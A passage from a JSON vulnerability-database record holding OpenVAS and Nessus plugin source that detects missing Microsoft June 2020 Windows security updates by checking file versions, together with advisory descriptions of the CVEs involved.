"CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4557957", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817144", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4557957)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU 
General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817144\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1120\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1204\", \"CVE-2020-1206\", \"CVE-2020-1207\",\n \"CVE-2020-1208\", \"CVE-2020-1209\", \"CVE-2020-1211\", \"CVE-2020-1212\",\n \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\", \"CVE-2020-1216\",\n \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1222\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1233\",\n \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1237\",\n \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\", \"CVE-2020-1242\",\n \"CVE-2020-1244\", \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1248\",\n \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\", \"CVE-2020-1255\",\n \"CVE-2020-1257\", \"CVE-2020-1258\", \"CVE-2020-1259\", \"CVE-2020-1261\",\n \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\",\n \"CVE-2020-1268\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1273\", \"CVE-2020-1274\", \"CVE-2020-1275\",\n 
\"CVE-2020-1276\", \"CVE-2020-1277\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\",\n \"CVE-2020-1284\", \"CVE-2020-1286\", \"CVE-2020-1287\", \"CVE-2020-1290\",\n \"CVE-2020-1291\", \"CVE-2020-1292\", \"CVE-2020-1293\", \"CVE-2020-1294\",\n \"CVE-2020-1296\", \"CVE-2020-1299\", \"CVE-2020-1300\", \"CVE-2020-1301\",\n \"CVE-2020-1302\", \"CVE-2020-1304\", \"CVE-2020-1305\", \"CVE-2020-1306\",\n \"CVE-2020-1307\", \"CVE-2020-1309\", \"CVE-2020-1311\", \"CVE-2020-1312\",\n \"CVE-2020-1313\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\",\n \"CVE-2020-1317\", \"CVE-2020-1324\", \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4557957)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4557957\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error when Connected User Experiences and Telemetry Service improperly\n handles file operations.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose 
sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 2004 for 32-bit Systems\n\n - Microsoft Windows 10 Version 2004 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4557957\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdiplus.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.19041.0\", test_version2:\"10.0.19041.328\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdiplus.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.19041.0 - 10.0.19041.328\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561674\nor cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561674: Windows Server 2012 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561612.NASL", "href": "https://www.tenable.com/plugins/nessus/137257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the 
Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137257);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561612\");\n script_xref(name:\"MSKB\", value:\"4561674\");\n script_xref(name:\"MSFT\", value:\"MS20-4561612\");\n script_xref(name:\"MSFT\", value:\"MS20-4561674\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n\n script_name(english:\"KB4561674: Windows Server 2012 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561674\nor cumulative update 4561612. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. 
An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. 
(CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561612/windows-server-2012-update-kb4561612\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c1557bf\");\n # https://support.microsoft.com/en-us/help/4561674/windows-server-2012-update-kb4561674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?003ee4f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561674 or Cumulative Update KB4561612.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
